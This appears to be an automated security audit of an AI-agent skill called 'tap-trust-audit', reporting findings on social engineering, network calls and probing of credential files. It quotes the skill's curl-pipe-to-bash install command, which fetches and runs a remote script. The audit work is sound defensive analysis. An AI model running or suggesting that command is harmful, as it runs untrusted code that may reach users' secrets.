Is skill/tap-trust-audit safe?
https://clawhub.ai/skill/tap-trust-audit
This skill presents a sophisticated social engineering attack disguised as a security tool. While the SKILL.md file itself contains no malicious code, its primary purpose is tricking users into executing dangerous curl|bash commands that download and run arbitrary code from external sources. The skill exploits security-themed branding to lower user defenses.
Category Scores
Findings (5)
CRITICAL Promotes dangerous curl|bash installation -90 ▶
The skill's primary purpose is instructing users to execute remote scripts via 'curl -sSL https://trust-audit-framework.vercel.app/api/install | bash', which bypasses all security controls and allows arbitrary code execution from an external source.
HIGH Social engineering through security theater -60 ▶
The skill presents itself as a 'Trust Audit Protocol' and security system while actually promoting extremely insecure installation practices. This is a form of social engineering designed to lower user guard through security-themed branding.
HIGH Deceptive security positioning -70 ▶
A skill that brands itself around 'trust', 'security', and 'verification' while promoting curl|bash execution represents a sophisticated social engineering attack that exploits user trust in security-branded content.
MEDIUM External network connections during install -40 ▶
The installation process made connections to external hosts (216.150.1.1:443) and performed DNS queries, indicating the skill attempts to contact external services during installation.
MEDIUM Sensitive file access without exfiltration -15 ▶
During the audit, the system accessed sensitive files (.env, SSH keys, AWS credentials) but did not exfiltrate them. This suggests the skill installation process may probe for sensitive files.